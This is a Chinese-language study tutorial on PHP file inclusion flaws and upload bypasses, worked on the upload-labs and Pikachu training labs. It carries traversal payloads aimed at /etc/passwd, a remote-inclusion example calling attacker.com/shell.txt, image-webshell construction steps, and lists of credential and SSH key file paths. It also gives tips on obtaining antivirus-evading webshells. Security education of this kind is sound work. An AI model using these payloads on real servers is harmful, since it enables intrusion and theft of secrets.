文件包含漏洞是一种常见的Web安全漏洞,其核心在于应用程序未对用户控制的文件路径或文件名进行严格过滤,导致攻击者能够包含并执行任意文件(包括本地或远程恶意文件)。
1. 文件包含原理
- 动态文件包含机制
开发者使用动态包含函数(如PHP的include
、require
)加载代码文件,但未对用户输入的路径参数进行校验,例如:
$page = $_GET['page'];
include($page . '.php'); // 用户可控的$page参数
- 关键问题
-
- 用户输入直接拼接至文件路径。
- 未限制可包含的文件范围(如允许包含非预期目录或远程文件)。
- 服务器配置不当(如PHP的
allow_url_include=On
允许包含远程文件)。 - 对$GET['cmd']参数没有经过严格的过滤,直接带入了 include() 函数,攻击者可以修改$ GET[‘cmd’]的值,加载其他文件,执行非预期的操作,由此 造成了文件包含漏洞:
在PHP的动态包含文件中,像include文件,在网页打开该文件并进行get传参即可访问服务器中其他的文件,这是一个操作流程
就是利用一个文件,调用另外一个文件。当这个文件中是代码时,就是直接调用代码。
并且还有一个好处,当知道文件位置时,就是不管文件后缀类型名,使用文件包含它都可以正常解析该文件
2. 文件包含有关的函数
include():当使用该函数包含文件时,只有代码执行到 include()函数是才将文件包含进 来,发生错误时只给出一个警告,继续向下执行
include_once():功能和 include()相同,区别在于当重复调用同一文件时,程序只调用 一次
requier():使用 require 函数包含文件时,只要程序一执行,立即调用脚本;如果前者 执行发生错误,函数或输出错误信息,并终止脚本运行 require_once():功能与 require()相同,区别在于当重复调用同一文件时,程序只调用 一
3. 漏洞类型
3.1. 本地文件包含(Local File Inclusion, LFI)
本地主机上的文件,文件名称是相对路径或者绝对路径
- 定义:攻击者通过构造路径包含服务器本地的敏感文件或恶意文件。
- 利用场景:
-
- 读取敏感文件:
/etc/passwd
、配置文件、日志文件等。 - 配合文件上传漏洞:包含已上传的Webshell。
- 利用PHP伪协议:
php://filter
读取文件源码,或php://input
执行代码。
- 读取敏感文件:
示例:
http://example.com/index.php?data=../../../../etc/passwd
-
3.2. 本地包含读文件
常用文件路径 apache+Linux 日志默认路径 /etc/httpd/logs/access.log、/var/log/httpd/access.log
apache+win2003 日志默认路径
D:\xampp\apache\logs\access.log、D:\xampp\apache\logs\error.log IIS6.0+win2003 默认日志文件
C:\WINDOWS\system32\Lognames
IIS7.0+win2003 默认日志文件
%SystemDrive%\inetpub\logs\Lognames
nginx 日志文件
/usr/local/nginx/logs
apache+linux 默认配置文件
/etc/httpd/conf/httpd.conf /etc/init.d/httpd IIS6.0+win2003
配置文件 C:/Windows/system32/inetsrv/metabase.xml
IIS7.0+WIN 配置文件 C:\Windows\System32\inetsrv\config\applicationHost.config
./:当前路径
../:上级目录
/:根目录
~/:linux 用户主目录
3.2.1.1. 文件地址,只要是windows系统就存在该文件
C:\Windows\win.ini
3.3. 2. 远程文件包含(Remote File Inclusion, RFI)
远程文件包含:包含互联网上的文件,文件名称为 URL 格式
- 定义:攻击者通过URL包含远程服务器上的恶意脚本(需服务器配置允许包含远程文件)。
- 利用条件:
-
- PHP配置中
allow_url_fopen=On
:允许打开url文件 - 且
allow_url_include=On
:允许引用url文件 。两个默认是开的 - 包含路径未限制协议(如允许
http://
、ftp://
)。
- PHP配置中
示例:
http://example.com/index.php?get中指令=http://attacker.com/shell.txt
与文件包含相关配置文件:php.ini
3.4. 图片马+文件包含绕过
属于白名单
pass-13
3.4.1. 制作图片马
在服务端的 PHP 代码中,对于用户上传的文件做文件类型检查,查看文件格式是否符合上传规范。
可以检查文件二进制格式的前几个字节,从而判断文件类型是否正确。
针对这种情况可以直接新建要给 1.jpg, 其中代码内容如下
GIF98A <?php phpinfo();?>
copy 1.jpg/b+2.php/a 3.jpg
准备好图片和 php 文件,桌面下打开命令行,输入命令制作图片马
3.jpg就是图片马
成果:图片能正常打开,并且含有php恶意代码
步骤:
- 在图片位置打开cmd
- 使用上面代码内容
- 成功
11.jpg与3.jpg看起来一样,实际不一样,比如:大小
上传,把文件位置复制到文件包含漏洞网页进行检验
文件包含访问。
访问成功
主要关键点:制作图片马,访问路径
3.5. 二次渲染
经过:
- 文件上传后会被二次渲染(调整大小,压缩),导致图片中的恶意码被清除
绕过方法:
- 上传正常图片并下载渲染后的文件。
- 对比原始文件与渲染后文件,找到未被修改的位置插入 PHP 代码。
- 重新上传并触发文件包含。
一般情况文件会缩小
pass-16
很明显图片是被渲染过的
使用16进制工具对比两张图片找出图片没有被渲染过的地方
将一句话木马再插入被渲染过的图片,再保存
再上传图片,再文件包含即可(使用gif的动图)
3.6. Pass-18:条件竞争漏洞
- 问题分析:文件先上传后校验,存在短暂的时间窗口。
- 绕过方法:
-
- 快速上传 PHP 文件并利用 Burp 的 Intruder 模块持续发送请求。
- 在文件被删除前访问上传路径执行代码
4. 任意文件读取/下载
任意文件读取/下载漏洞 是指攻击者通过Web应用程序的缺陷,
绕过权限限制,直接访问或下载服务器上的任意文件(包括敏感配置文件、源代码、用户数据等)。
是指攻击者可以 通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。
5. pikachu
使用pikachu靶场实验文件读取与下载实操
5.1. 文件下载
点击kb图片下载
然后访问下载连接,根据url得fliname蕴含什么含义,可能文件是直接再服务器中访问下载的
在之前本地文件包含中含有一个windows配置文件
C:\Windows\win.ini
我们可以使用../../../ 查询到上级目录(方法:可以使用bp在get请求添加,也可以在url网址添加)
那么利用这一个漏洞,我们可以下载服务器中重要的文件或者说到该目录的任何文件。
如果有这个文件则将访问并下载,为什么多个../../
因为我们也不知道它上级目录有多少个,所以使用多个
注:
像以下可能存在文件下载漏洞
path
flie 等含各种参数的
5.2. 常见的敏感信息路径
5.2.1. Windows 系统
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS 配置文件 C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql 配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php 配置信息
C:\Windows\my.ini //Mysql 配置信息
5.2.2. Linux/Unix 系统
/root/.ssh/authorized_keys //如需登录到远程主机,需要到.ssh 目录下,新建 authorized_keys 文件,并将 id_rsa.pub 内容复制进去
/root/.ssh/id_rsa //ssh 私钥,ssh 公钥是 id_rsa.pub
/root/.ssh/id_ras.keystore //记录每个访问计算机用户的公钥 /root/.ssh/known_hosts
//ssh 会把每个访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访 问相同计算机时,OpenSSH 会核对公钥。如果公钥不同,OpenSSH 会发出警告, 避 免你受到 DNS Hijack 之类的攻击。
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/etc/my.cnf //mysql 配置文件
/etc/httpd/conf/httpd.conf // Apache 配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql 历史命令记录文件
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的 cmdline 参数
6. (文件相关漏洞)注意事项(重点)
- 我们上传一个后缀为php或者asp,文件,能上传成功表示该文件后缀可以进行下一步操作(不直接使用一句话,因为有非常大的几率被杀)
- 我们需要知道路径,能够访问到asp即刚刚上传的文件
- 在文件有一行代码,需要会解析,而不是输出文件所有内容
- 上传一句话木马,被杀了,那就想到免杀手段:一般去找别人上传的免杀码,或者工具,然后使用webshell连接